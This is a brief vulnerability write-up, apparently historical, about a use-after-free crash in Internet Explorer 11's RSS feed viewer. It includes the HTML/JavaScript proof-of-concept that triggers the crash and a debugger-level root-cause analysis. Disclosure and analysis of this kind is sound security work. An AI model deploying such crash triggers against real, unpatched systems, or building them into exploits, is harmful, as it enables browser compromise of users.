Rapidly alternating an iFrame between an RSS XML file and about:blank at 100ms intervals crashed IE11 in IEFRAME!CFeedViewer::_HandleZoomChange. The crash was classified PROBABLY_EXPLOITABLE — the faulting address controlled a branch target, indicating a likely use-after-free scenario.
<iframe name="ifrName" width="200" height="30"></iframe>
<script language="JavaScript">
function main()
{
if (sch = !window.sch)
{
ifrName.location = "rss.xml";
}
else
{
window.open("about:blank", "ifrName");
}
}
</script>Triggering setInterval('main()', 100) caused the iFrame to oscillate between RSS rendering mode and blank. The RSS viewer component (CFeedViewer) was being torn down and re-initialized faster than it could clean up. When _HandleZoomChange fired during a zoom state transition triggered by the markup switch, eax was null — a mov ecx, dword ptr [eax] at +0x32 caused the access violation. The call chain traces through CZoomState::LoadPersistedZoomState → COmWindowProxy::SwitchMarkup, suggesting the feed viewer’s reference to its hosting window was released before the zoom callback completed.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.